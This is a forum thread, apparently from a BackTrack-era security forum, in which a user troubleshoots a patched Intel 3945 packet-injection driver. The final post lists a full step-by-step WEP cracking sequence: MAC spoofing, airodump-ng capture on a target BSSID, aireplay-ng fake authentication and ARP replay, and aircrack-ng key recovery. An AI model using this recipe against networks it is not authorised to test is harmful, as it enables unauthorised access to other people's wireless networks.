    Unhappy IPW 3945 injection driver query

    Hi guys,

    (I cant post anywhere apart from the newbie corner for now so im reffering to post:

    hxxp://forums.remote-exploit.org/showthread.php?t=7633
    and
    hxxp://forums.remote-exploit.org/showthread.php?t=7260

    I followed the instructions on installing the injection driver and it seems to work (created an interface called rtap0)

    however my card is no longer seen and can no longer go into monitor mode.

    I followed the transcript provided by samsung (carried out by exploit) but when i run airmon (airmon-ng start wifi0 + airmon-ng start rtap0) it doesnt show my card in the columns. usualy with the IPW3945 it shows my card (interface eth0) and shows it in monitor status.

    hope you guys can shine some light onto it or let me know if im doing anything wrong.

    I've tried it when booting from the live CD and also a HDD install.

    Cheers,

    S

    Afraid so viruel:

    I unloaded them via:

    /sbin/modprobe -r ipw3945
    /usr/src/drivers/ipw3945-1.2.0/unload

    and reloaded the patched drivers:

    /tmp/ipwraw/load

    - The install seems to go fine and it does indeed create an rtap0 interface as it should but when i try to start airmon all i get is

    Interface Chipset Driver

    regardless of what interface i try to start airmon on (rtap - wifi0)

    just a bit confused because the normal driver lists everything fine and will go into monitor mode with no probs :|

    Been workin on it for hours and just cant seem to get it nailed

    P.S> It would be great if someone currently using the 3945 with the patched driver could post the commands they are using (for airmon & aireplay etc) just so i can be sure am doing everything right. >>> I've got the feeling its something silly or something am missing out.

    Cheers for the help,

    S

    After i install the driver and unloaded the ipw3945 and loaded the ipraw driver, i did the iwconfig command and the wifi0 is in monitor mode and i don't need to use the airmon-ng to do this or iwconfig. Plus, i used the wifio and not the rtap0.

    CHEERS FUNNYMAN!!! I MANAGED TO DO IT!

    Followed your advice and it started pickin up the IVs almost instantly

    Here's the commands i used

    STEP 1
    ++++++

    airmon-ng stop ath0
    ifconfig wifi0 down
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start wifi0
    airodump-ng wifi0 <------ Ctrl + c to break command and copy BSSID.
    airodump-ng -c 11 -w test --bssid 00:17:3F:4A:E1:EA wifi0

    STEP 2
    ++++++
    aireplay-ng -1 0 -e mrouter -a 00:17:3F:4A:E3:EB -h 00:11:22:33:44:55 wifi0 <------Run in New Shell

    STEP 3
    ++++++
    aireplay-ng -3 -b 00:17:3F:4A:E3:EB -h 00:11:22:33:44:55 wifi0 <------ Run in New Shell - Once 500 packets are received run step 2 again.

    STEP 4
    ++++++
    aircrack-ng *.cap

    for some reason if i didnt run step 2 again after 500 packets were received aireplay would just keep going then give an error asking if it was associated or not :S

    NONE THE LESS WORKING NOW

    CHEERS AGAIN
